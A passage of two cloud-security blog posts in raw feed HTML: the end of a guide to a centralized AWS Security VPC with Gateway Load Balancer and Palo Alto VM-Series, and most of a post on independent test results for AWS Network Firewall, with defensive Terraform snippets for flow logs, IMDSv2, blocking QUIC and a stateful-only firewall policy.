&lt;li&gt;Flow Logs on Gateway Load Balancer Endpoint interface with custom fields: &lt;code&gt;${pkt-srcaddr}&lt;/code&gt;, &lt;code&gt;${pkt-dstaddr}&lt;/code&gt;, &lt;code&gt;${flow-direction}&lt;/code&gt;, &lt;code&gt;${tcp-flags}&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Logs directly on VM-Series&lt;/li&gt;
&lt;li&gt;AWS &lt;a href="https://docs.aws.amazon.com/vpc/latest/reachability/what-is-reachability-analyzer.html" rel="noopener noreferrer"&gt;Reachability Analyzer&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Simultaneous tcpdump on client, server, and firewall interfaces&lt;/li&gt;
&lt;/ul&gt;
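
&lt;p&gt;The first item above can be sketched in Terraform roughly like this. It is a minimal sketch, not a drop-in module: the variable names &lt;code&gt;gwlbe_eni_id&lt;/code&gt; and &lt;code&gt;flow_log_bucket_arn&lt;/code&gt; are hypothetical placeholders, and sending the logs to S3 is just an assumption to keep the example short.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;# Hypothetical inputs: the ENI of one GWLB endpoint and an S3 bucket ARN for the logs.
variable "gwlbe_eni_id" {
  type = string
}

variable "flow_log_bucket_arn" {
  type = string
}

resource "aws_flow_log" "gwlbe" {
  eni_id               = var.gwlbe_eni_id
  traffic_type         = "ALL"
  log_destination_type = "s3"
  log_destination      = var.flow_log_bucket_arn

  # "$${...}" is Terraform's escape for a literal "${...}" in the flow log format.
  # pkt-srcaddr / pkt-dstaddr carry the original packet addresses.
  log_format = "$${interface-id} $${srcaddr} $${dstaddr} $${pkt-srcaddr} $${pkt-dstaddr} $${srcport} $${dstport} $${protocol} $${flow-direction} $${tcp-flags} $${action}"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Comparing &lt;code&gt;srcaddr&lt;/code&gt;/&lt;code&gt;dstaddr&lt;/code&gt; with &lt;code&gt;pkt-srcaddr&lt;/code&gt;/&lt;code&gt;pkt-dstaddr&lt;/code&gt; on the endpoint interface is usually the quickest way to see which flow actually reached the endpoint and in which direction.&lt;/p&gt;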

&lt;h2&gt;
  
  
  8. One Security VPC or two?
&lt;/h2&gt;

&lt;p&gt;If you need to inspect both east-west (VPC-to-VPC) and north-south (internet ingress/egress) traffic, you might wonder whether one Security VPC is enough.&lt;/p&gt;

&lt;p&gt;The good news - a single Security VPC with Appliance Mode ON works for both traffic types. North-south traffic is not broken by Appliance Mode. For internet-bound traffic (where the destination has no AZ), TGW with Appliance Mode selects the ENI in the source AZ anyway - so it behaves almost identically to the default AZ affinity.&lt;/p&gt;

&lt;p&gt;So why do some AWS guides recommend two separate Security VPCs? The answer is &lt;strong&gt;resilience&lt;/strong&gt;, not cost (TGW cross-AZ data transfer has been &lt;a href="https://aws.amazon.com/about-aws/whats-new/2022/04/aws-data-transfer-price-reduction-privatelink-transit-gateway-client-vpn-services/" rel="noopener noreferrer"&gt;free since April 2022&lt;/a&gt;). With Appliance Mode ON, TGW uses a flow hash that can send traffic from a healthy AZ to appliances in an impaired AZ. With Appliance Mode OFF, AZ affinity isolates the blast radius - if AZ1 goes down, AZ2 traffic continues unaffected.&lt;/p&gt;

&lt;p&gt;In practice, there are three options:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;One Security VPC with Appliance Mode ON&lt;/strong&gt; - works for both E-W and N-S. Simpler to manage, accepts the resilience trade-off. This is what most deployments use.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Two Security VPCs&lt;/strong&gt; - one for E-W (Appliance Mode ON), one for N-S (Appliance Mode OFF). Maximum AZ isolation, but double the infrastructure and operational overhead.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;One Security VPC with Appliance Mode OFF&lt;/strong&gt; - breaks east-west inspection. Don't do this.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;One more thing to keep in mind: in multi-account setups, &lt;a href="https://awslabs.github.io/landing-zone-accelerator-on-aws/latest/faq/networking/gwlb/" rel="noopener noreferrer"&gt;AZ names map to different physical zones per account&lt;/a&gt; - use AZ IDs (e.g., &lt;code&gt;use1-az1&lt;/code&gt;), not names.&lt;/p&gt;
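
&lt;p&gt;For option 1, the two settings discussed above could look roughly like this in Terraform. Treat it as a sketch under assumptions: the variable names and the CIDR block are hypothetical placeholders, and a real deployment would have one TGW subnet per AZ rather than the single one shown here.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;# Hypothetical inputs for illustration only.
variable "transit_gateway_id" {
  type = string
}

variable "security_vpc_id" {
  type = string
}

# Pin the subnet by AZ ID, not AZ name, so it lands in the same
# physical zone regardless of which account creates it.
resource "aws_subnet" "tgw_az1" {
  vpc_id               = var.security_vpc_id
  cidr_block           = "10.0.0.0/28" # placeholder range
  availability_zone_id = "use1-az1"
}

resource "aws_ec2_transit_gateway_vpc_attachment" "security" {
  transit_gateway_id = var.transit_gateway_id
  vpc_id             = var.security_vpc_id
  subnet_ids         = [aws_subnet.tgw_az1.id]

  # Appliance Mode ON keeps both directions of a flow on the same appliance.
  appliance_mode_support = "enable"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;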

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://docs.aws.amazon.com/whitepapers/latest/building-scalable-secure-multi-vpc-network-infrastructure/using-gwlb-with-tg-for-cns.html" rel="noopener noreferrer"&gt;AWS Whitepaper: GWLB with TGW for centralized security&lt;/a&gt;, &lt;a href="https://aws.amazon.com/blogs/apn/centralized-traffic-inspection-with-gateway-load-balancer-on-aws/" rel="noopener noreferrer"&gt;AWS APN Blog: Centralized traffic inspection with GWLB&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  9. IMDSv2 and bootstrap - check your PAN-OS version
&lt;/h2&gt;

&lt;p&gt;Not all PAN-OS versions of VM-Series support IMDSv2. When I first ran into this problem, I thought I was going to lose all my hair. The process was standard: I set the bootstrap in user data, everything looked perfect, and... nothing bootstrapped. I scoured the internet for the cause, which turned out to be a single small checkbox in the virtual machine configuration - "Enable IMDSv2." I unchecked it, redeployed with the same bootstrap - eureka! Everything worked as it should.&lt;/p&gt;

&lt;p&gt;That was on an older PAN-OS version. The good news is that Palo Alto has supported IMDSv2 since 2022:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;BYOL: PAN-OS 10.2.0+ with VM-Series Plugin 3.0.0+&lt;/li&gt;
&lt;li&gt;PAYG: PAN-OS 10.2.5+ with Plugin 3.0.0+&lt;/li&gt;
&lt;li&gt;Panorama: PAN-OS 10.2.3+&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The only thing you need to set is the EC2 metadata options:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;metadata_options&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;http_endpoint&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"enabled"&lt;/span&gt;
  &lt;span class="nx"&gt;http_tokens&lt;/span&gt;   &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"required"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Keep this in mind if your bootstrap fails for no apparent reason.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt; &lt;a href="https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA14u000000CqfQCAS" rel="noopener noreferrer"&gt;Palo Alto KB: IMDSv2 support for VM firewall and Panorama in AWS&lt;/a&gt;, &lt;a href="https://docs.paloaltonetworks.com/plugins/vm-series-and-panorama-plugins-release-notes/vm-series-plugin/vm-series-plugin-30/vm-series-plugin-300" rel="noopener noreferrer"&gt;VM-Series Plugin 3.0.0 Release Notes&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  So what should you do with all this information?
&lt;/h2&gt;

&lt;p&gt;Generally, do what you feel is right, but I suggest answering a few important questions before implementing:&lt;/p&gt;

&lt;p&gt;Is your environment truly sensitive enough to require centralized traffic inspection? Is the data stored in your environment highly sensitive? If you answered yes to both questions, then you need this solution. If you have any doubts, reconsider - maybe a &lt;a href="https://haitmg.pl/blog/aws-network-firewall-vs-palo-alto-vm-series/" rel="noopener noreferrer"&gt;native AWS firewall&lt;/a&gt; will suffice?&lt;/p&gt;

&lt;p&gt;Do you have experience configuring Palo Alto hardware? Without it, it will be difficult to navigate the initial process without wading through reams of documentation. It's not just the VM-Series configuration itself, but also the AWS configuration at both the network and resource levels. You can always ask Palo Alto for a dedicated specialist, who will handle this for you... But you'll also pay for that.&lt;/p&gt;

&lt;p&gt;Consider whether you can afford this solution. It's not a small amount. Go through section 3 again and judge for yourself.&lt;/p&gt;

&lt;p&gt;Remember that simply implementing VM-Series in production can be risky. It's good to have at least a minimal test environment to test your configuration before rolling it out to production, as you could shut down your business and not know why.&lt;/p&gt;

&lt;p&gt;If you have no doubts about any of the above and can meet all of these requirements, go for it; this solution is for you.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Building a centralized Security VPC on AWS with GWLB? I've deployed this architecture for enterprise clients and know where the bodies are buried. &lt;a href="https://haitmg.pl/#contact" rel="noopener noreferrer"&gt;Let's talk&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>cloud</category>
      <category>devops</category>
    </item>
    <item>
      <title>AWS Network Firewall blocked 0.59% of exploits in independent testing - what this means for your cloud</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Sun, 08 Mar 2026 20:30:55 +0000</pubDate>
      <link>https://dev.to/haitmg/aws-network-firewall-blocked-059-of-exploits-in-independent-testing-what-this-means-for-your-51p6</link>
      <guid>https://dev.to/haitmg/aws-network-firewall-blocked-059-of-exploits-in-independent-testing-what-this-means-for-your-51p6</guid>
      <description>&lt;p&gt;In the spring of 2025, the results of a test comparing cloud firewalls were published on the &lt;a href="https://cyberratings.org/cyberratings-org-publishes-test-results-on-cloud-network-firewalls/" rel="noopener noreferrer"&gt;CyberRatings.org&lt;/a&gt; laboratory website. Ten providers were included in the test. The AWS firewall blocked &lt;strong&gt;0.59% of exploits&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;When additional bypass tests were applied, the effectiveness dropped to &lt;strong&gt;0%&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;In my DevOps career, I have implemented both native AWS firewalls and those from Palo Alto (VM-Series and CNGFW). To this day, some customers still use the AWS firewall. This article is not a criticism; it is a realistic and objective (at least I hope so) look at what these numbers actually mean, what you should do with them, and what to keep in mind if you use the AWS Network Firewall.&lt;/p&gt;

&lt;h2&gt;
  
  
  Three rounds of testing, same result
&lt;/h2&gt;

&lt;p&gt;First and foremost, it's worth noting: this wasn't a one-time test. CyberRatings tested the AWS firewall three times:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://cyberratings.org/cyberratings-org-announces-test-results-for-cloud-network-firewall/" rel="noopener noreferrer"&gt;April 2024&lt;/a&gt;&lt;/strong&gt; - 11 vendors were tested against 984 exploits and 1,645 bypasses. AWS scored &lt;strong&gt;5.39% security effectiveness&lt;/strong&gt; - the lowest among all tested vendors. The rating was "Caution" (6 vendors received "Recommended," 1 "Neutral," and 4 "Caution").&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://cyberratings.org/cyberratings-org-announces-test-results-for-cloud-service-provider-native-firewalls/" rel="noopener noreferrer"&gt;November 2024&lt;/a&gt;&lt;/strong&gt; - Mini-test. Only the native AWS, Azure, and GCP firewalls were included. AWS blocked &lt;strong&gt;0.38% of exploits&lt;/strong&gt; (2 out of 522). Its counterparts scored higher - Azure 24.14%, GCP 50.57%. Keysight CyPerf v5.0 was used as the test platform.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://cyberscoop.com/independent-tests-show-why-orgs-should-use-third-party-cloud-security-services/" rel="noopener noreferrer"&gt;April 2025&lt;/a&gt;&lt;/strong&gt; - Firewall Comparison Report for Q1 2025. Ten vendors were tested for &lt;strong&gt;2,028 exploits&lt;/strong&gt; and &lt;strong&gt;2,500 attacks using 27 techniques&lt;/strong&gt;. AWS (horror of horrors) &lt;strong&gt;0.59%&lt;/strong&gt;. After security bypass tests, &lt;strong&gt;0%&lt;/strong&gt;. For comparison - the largest vendors (Check Point, Fortinet, Juniper, Palo Alto Networks, Versa) from &lt;strong&gt;99.61% to 100%&lt;/strong&gt;. The differences are dramatic.&lt;/p&gt;

&lt;h2&gt;
  
  
  Wait - 0% doesn't mean "does nothing"
&lt;/h2&gt;

&lt;p&gt;And here's a moment to pause - 0% doesn't mean the firewall is doing nothing. Before you give up on your AWS firewall, let me explain what these results really mean.&lt;/p&gt;

&lt;p&gt;CyberRatings tests how well a firewall blocks exploits for known vulnerabilities (CVEs) from the last 10 years, and how well it holds up when those exploits are combined with evasion techniques at layers 3, 4, and 7 of the OSI model. The key is that AWS Network Firewall wasn't designed as an IPS/IDS system in the traditional sense. It's a managed service built on Suricata with a specific set of features (domain filtering, IP/port rules, and OPTIONALLY &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/aws-managed-rule-groups-threat-signature.html" rel="noopener noreferrer"&gt;threat signature management&lt;/a&gt;). Its primary purpose is network segmentation and traffic filtering - NOT catching exploits based on the CVE database.&lt;/p&gt;

&lt;p&gt;The problem is that AWS sells its firewalls with advertising phrases like "intrusion prevention" and "threat detection." Well, since you're paying for IPS rule groups and just over half a percent of exploits are detected, it's probably a problem, regardless of the design assumptions.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why such low results? Here's a technical explanation.
&lt;/h2&gt;

&lt;p&gt;In my career, I've worked with both Suricata firewalls and those supporting App-ID. The difference stems from the underlying architecture.&lt;/p&gt;

&lt;h3&gt;
  
  
  Suricata in AWS NFW
&lt;/h3&gt;

&lt;p&gt;AWS runs &lt;a href="https://aws.amazon.com/blogs/opensource/scaling-threat-prevention-on-aws-with-suricata/" rel="noopener noreferrer"&gt;Suricata&lt;/a&gt; in the background. Suricata is an open-source IDS/IPS engine, but AWS NFW &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/suricata-limitations-caveats.html" rel="noopener noreferrer"&gt;does not support&lt;/a&gt; all of its functionality:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Lua scripts&lt;/strong&gt; - most advanced Suricata rules use them for complex detection logic&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;File extraction&lt;/strong&gt; - no downloading for analysis&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;iprep&lt;/strong&gt; - no IP scoring&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Datasets/datarep&lt;/strong&gt; - no custom data matching&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;IKEv2 and IP-in-IP protocol detection&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;pcre&lt;/strong&gt; is limited to working only with content, tls.sni, http.host, and dns.query&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This shouldn't be underestimated. Lua scripts alone significantly enhance Suricata's detection. Without them, you're only using a fraction of its capabilities.&lt;/p&gt;

&lt;h3&gt;
  
  
  Stateful and Stateless Switching Problem
&lt;/h3&gt;

&lt;p&gt;This is the technical cause of the problem identified by CyberRatings.&lt;/p&gt;

&lt;p&gt;AWS NFW processes traffic in two stages: first through the &lt;strong&gt;stateless engine&lt;/strong&gt; (5-tuple matching), and then optionally through the &lt;strong&gt;stateful engine&lt;/strong&gt; (Suricata). Unfortunately, &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/firewall-rules-engines.html" rel="noopener noreferrer"&gt;stateless rules are evaluated first&lt;/a&gt; and can interfere with stateful inspection.&lt;/p&gt;

&lt;p&gt;Nevertheless, CyberRatings &lt;a href="https://www.sdxcentral.com/analysis/is-the-aws-network-firewall-safe-cyberratings-tests-reveal-concerns/" rel="noopener noreferrer"&gt;documented&lt;/a&gt; that they followed AWS documentation. Furthermore, they hired a certified AWS consultant to configure the firewall and worked directly with AWS engineers. Despite this, they found erroneous switching between engines. &lt;a href="https://aws.github.io/aws-security-services-best-practices/guides/network-firewall/" rel="noopener noreferrer"&gt;AWS Best Practice&lt;/a&gt; currently recommends setting the default stateless action to "Forward to Stateful Rule Groups" and completely avoiding configuring stateless rules. Simply put, it's killing half the engine because it's not cooperating with the other half.&lt;/p&gt;

&lt;h3&gt;
  
  
  Evasion is the real killer
&lt;/h3&gt;

&lt;p&gt;The 0.59% exploit score is bad. The 0% evasion score is even worse.&lt;/p&gt;

&lt;p&gt;CyberRatings tested 2,500 attacks using 27 bypass techniques at Layers 3, 4, and 7. When a firewall fails to handle evasion at lower layers, the score drops dramatically - even if it detects several exploits at first glance. AWS NFW failed the bypass tests so badly that the few exploits it did detect were nullified.&lt;/p&gt;

&lt;p&gt;AWS has not publicly commented on or disputed the CyberRatings test results.&lt;/p&gt;

&lt;p&gt;For context: bypass techniques include things like IP fragmentation, TCP segmentation, and protocol-level obfuscation. These are standard techniques used daily by penetration testers and real attackers. A production-grade firewall must be able to handle them.&lt;/p&gt;

&lt;h2&gt;
  
  
  It's not just AWS - all three hyperscalers failed
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Cloud Provider&lt;/th&gt;
&lt;th&gt;Exploit Block Rate&lt;/th&gt;
&lt;th&gt;Overall (after evasions)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AWS Network Firewall&lt;/td&gt;
&lt;td&gt;0.59%&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;0%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Azure Firewall&lt;/td&gt;
&lt;td&gt;55.28%&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;0%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GCP Cloud Firewall&lt;/td&gt;
&lt;td&gt;96.60%&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;0%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Third-party vendors (5)&lt;/td&gt;
&lt;td&gt;99.61-100%&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;99.61-100%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;GCP detected most of the exploits. But what good is that if bypass tests also yielded 0%? Azure is even worse than GCP.&lt;/p&gt;

&lt;p&gt;So what's the conclusion? AWS isn't uniquely terrible. The problem is that cloud-native firewalls aren't designed as next-generation firewalls (NGFWs). As &lt;a href="https://www.sdxcentral.com/analysis/hyperscaler-cloud-firewalls-again-fail-to-meet-basic-security-standards/" rel="noopener noreferrer"&gt;SDxCentral put it&lt;/a&gt;, "first-class cybersecurity firewall services aren't the highest priority for hyperscale cloud providers, whose first orders of business are to store and distribute data and not lose it."&lt;/p&gt;

&lt;p&gt;Let's be honest about this. AWS provides the infrastructure, and they sell security features as a bonus. Companies like Palo Alto Networks, Fortinet, and Check Point are strictly security-focused. The priorities are different, and therefore, the results are different.&lt;/p&gt;

&lt;h2&gt;
  
  
  Who is CyberRatings anyway? Is it worth paying attention to them?
&lt;/h2&gt;

&lt;p&gt;Contrary to appearances, this is a crucial question. Could they be deliberately trying to make AWS look bad? Let's examine their credibility.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://cyberratings.org/about-us/leadership/" rel="noopener noreferrer"&gt;CyberRatings.org&lt;/a&gt; is a non-profit organization founded in November 2020 by &lt;strong&gt;Vikram Phatak&lt;/strong&gt;. Phatak founded &lt;strong&gt;NSS Labs&lt;/strong&gt; in 2007 and managed it for over a decade - NSS Labs was the industry standard for independent firewall testing before its closure. CyberRatings is currently working with the revived NSS Labs as an &lt;a href="https://cyberratings.org/cyberratings-org-names-nss-labs-as-official-testing-partner/" rel="noopener noreferrer"&gt;official testing partner&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;There is some controversy: NSS Labs was involved in a &lt;a href="https://www.darkreading.com/endpoint-security/nss-labs-admits-its-test-of-crowdstrike-falcon-was-inaccurate-" rel="noopener noreferrer"&gt;legal dispute with CrowdStrike from 2017 to 2018&lt;/a&gt;, in which it admitted to "inaccurate" testing of the CrowdStrike Falcon endpoint product and subsequently filed an antitrust lawsuit against CrowdStrike, AMTSO, and several other vendors. The CrowdStrike portion was settled confidentially in 2019; the broader antitrust claims were dismissed by the court. This is a significant part of the story and worth knowing when you weigh the results.&lt;/p&gt;

&lt;p&gt;CyberRatings' AWS NFW testing was self-funded, with no vendor involvement. It used an industry-standard test platform (Keysight CyPerf), and the results were consistent across three separate rounds of testing over a 12-month period. The fact that the organization hired a certified AWS consultant and worked directly with AWS engineers makes the "misconfiguration" argument difficult to sustain.&lt;/p&gt;

&lt;h2&gt;
  
  
  Getting back to AWS Firewall... So what is it really good at?
&lt;/h2&gt;

&lt;p&gt;Despite these test results, I still recommend AWS Network Firewall to clients. Here's why.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Domain-based outbound filtering.&lt;/strong&gt; If you want to control which domains your workloads can reach, NFW does it well - especially with &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-configurations.html" rel="noopener noreferrer"&gt;TLS inspection enabled&lt;/a&gt; to prevent &lt;a href="https://haitmg.pl/blog/aws-network-firewall-vs-palo-alto-vm-series/#the-egress-filtering-bypass-that-changes-the-conversation" rel="noopener noreferrer"&gt;SNI spoofing&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Network segmentation.&lt;/strong&gt; VPC-to-VPC traffic control via Transit Gateway. IP and port-based rules. Basic allow/deny logic. This is exactly what most teams use it for.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Centralized logging.&lt;/strong&gt; Full visibility of network flows thanks to native CloudWatch and S3 integration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Zero operational overhead.&lt;/strong&gt; No patching, no sizing, no HA configuration. It just works.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Compliance checkbox.&lt;/strong&gt; For many compliance frameworks, having a firewall with logging and rules is a requirement - not a 99% score in an independent IPS test.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cost.&lt;/strong&gt; At &lt;a href="https://aws.amazon.com/network-firewall/pricing/" rel="noopener noreferrer"&gt;$0.395/hour per endpoint&lt;/a&gt; (or $0.489 with TLS inspection), it's four times cheaper than using Palo Alto VM-Series. And as of &lt;a href="https://aws.amazon.com/about-aws/whats-new/2026/02/aws-network-firewall-new-price-reduction/" rel="noopener noreferrer"&gt;February 2026&lt;/a&gt;, AWS has eliminated additional data processing fees for advanced inspection.&lt;/p&gt;

&lt;p&gt;These are real benefits. For a startup focused on basic outbound filtering or an internal application behind a transit gateway, NFW is the right tool. Just don't confuse it with an IPS system.&lt;/p&gt;

&lt;h2&gt;
  
  
  So what do third-party firewalls do differently?
&lt;/h2&gt;

&lt;p&gt;The difference between 0.59% and 99.61% isn't due to budget or effort. It's about the architectural approach.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;App-ID vs. signatures.&lt;/strong&gt; Palo Alto's &lt;a href="https://www.paloaltonetworks.com/technologies/app-id" rel="noopener noreferrer"&gt;App-ID&lt;/a&gt; classifies traffic based on application behavior - payload inspection, behavioral patterns, protocol decoding - regardless of port. The AWS firewall classifies traffic based on port, protocol, and Suricata signatures. These are fundamentally different approaches. App-ID can distinguish legitimate HTTPS from reverse-shell tunneled protocols on port 443. To Suricata, both appear as TLS on port 443.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Full evasion handling.&lt;/strong&gt; Third-party firewalls reassemble fragmented packets, normalize protocols, and handle TCP segmentation before applying detection rules. This is why they withstand bypass tests. It is computationally expensive and adds latency, but that's what you pay $3,000 per month for instead of $750.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Continuous signature updates.&lt;/strong&gt; Palo Alto's threat intelligence team updates signatures daily, addressing new CVEs. AWS managed rule groups update less frequently and include fewer signatures.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;One note:&lt;/strong&gt; third-party firewalls aren't perfect. For example, in &lt;a href="https://cyberratings.org/cyberratings-org-and-nss-labs-announce-follow-on-enterprise-firewall-results/" rel="noopener noreferrer"&gt;CyberRatings' Q4 2025 test&lt;/a&gt;, Palo Alto Networks' PA-1410 firewall initially scored &lt;strong&gt;0% in bypass resistance&lt;/strong&gt; and a mere 46.37% in overall score. However, (credit where credit is due) after updating the Palo Alto operating system to version 11.2.10, its resistance increased to 100% and its overall score to 96.07%. The conclusion is simple: even companies dedicated to security must update their operating systems, and no vendor is always immune to vulnerabilities.&lt;/p&gt;

&lt;h2&gt;
  
  
  You've confused me... So what should I do?
&lt;/h2&gt;

&lt;p&gt;If you're using AWS Network Firewall, here are my recommendations:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Understand what you're actually getting
&lt;/h3&gt;

&lt;p&gt;NFW is a managed traffic filtering service. It's great for domain allow/deny lists, IP rules, and network segmentation. It's not an IPS that will detect known exploits. Adjust your expectations and security architecture accordingly.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Enable TLS Inspection
&lt;/h3&gt;

&lt;p&gt;If you haven't already, &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-configurations.html" rel="noopener noreferrer"&gt;enable TLS inspection&lt;/a&gt;. This costs an additional $0.094/hour per endpoint, but it minimizes the &lt;a href="https://haitmg.pl/blog/aws-network-firewall-vs-palo-alto-vm-series/#the-egress-filtering-bypass-that-changes-the-conversation" rel="noopener noreferrer"&gt;SNI bypass vulnerability&lt;/a&gt; and provides real visibility into encrypted traffic.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Block QUIC
&lt;/h3&gt;

&lt;p&gt;AWS NFW &lt;a href="https://docs.aws.amazon.com/network-firewall/latest/developerguide/tls-inspection-considerations.html" rel="noopener noreferrer"&gt;can't inspect QUIC traffic&lt;/a&gt;. HTTP/3 relies on QUIC. Add a stateful rule to block UDP/443 and force clients to fall back to TCP/TLS, where the firewall can actually monitor traffic.&lt;/p&gt;
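
&lt;p&gt;A rule like that could be sketched in Terraform as follows. This is only an illustration: the rule group name, the capacity, and the &lt;code&gt;sid&lt;/code&gt; value are arbitrary placeholders, and you still have to reference the rule group from your firewall policy.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;resource "aws_networkfirewall_rule_group" "block_quic" {
  name     = "block-quic" # placeholder name
  type     = "STATEFUL"
  capacity = 10           # placeholder capacity

  rule_group {
    rules_source {
      stateful_rule {
        # Drop anything sent to UDP/443 so clients fall back to TCP/TLS.
        action = "DROP"

        header {
          protocol         = "UDP"
          source           = "ANY"
          source_port      = "ANY"
          direction        = "FORWARD"
          destination      = "ANY"
          destination_port = "443"
        }

        rule_option {
          keyword  = "sid"
          settings = ["1000001"] # arbitrary signature ID
        }
      }
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;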

&lt;h3&gt;
  
  
  4. Don't use stateless rules
&lt;/h3&gt;

&lt;p&gt;Follow &lt;a href="https://aws.github.io/aws-security-services-best-practices/guides/network-firewall/" rel="noopener noreferrer"&gt;AWS best practices&lt;/a&gt;: set the default stateless action to "Forward to stateful rule groups." Don't configure stateless rules - they can interfere with stateful inspection. This is what CyberRatings says breaks the engine.&lt;/p&gt;
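
&lt;p&gt;In Terraform, that recommendation might look roughly like the policy below. It is a minimal sketch: the policy name and the &lt;code&gt;stateful_rule_group_arn&lt;/code&gt; variable are hypothetical, and a real policy would reference all of your stateful rule groups.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;# Hypothetical input: ARN of an existing stateful rule group.
variable "stateful_rule_group_arn" {
  type = string
}

resource "aws_networkfirewall_firewall_policy" "stateful_only" {
  name = "stateful-only" # placeholder name

  firewall_policy {
    # No stateless rule groups: every packet (and fragment) goes
    # straight to the stateful (Suricata) engine.
    stateless_default_actions          = ["aws:forward_to_sfe"]
    stateless_fragment_default_actions = ["aws:forward_to_sfe"]

    stateful_rule_group_reference {
      resource_arn = var.stateful_rule_group_arn
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;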

&lt;h3&gt;
  
  
  5. Layered Security
&lt;/h3&gt;

&lt;p&gt;NFW shouldn't be the only layer of security. Combine this with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GuardDuty&lt;/strong&gt; for threat detection (behavioral analysis, not signatures)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security Hub&lt;/strong&gt; for posture management&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;WAF&lt;/strong&gt; for public-facing applications&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;VPC endpoint policies&lt;/strong&gt; to restrict access to services&lt;/li&gt;
&lt;li&gt;
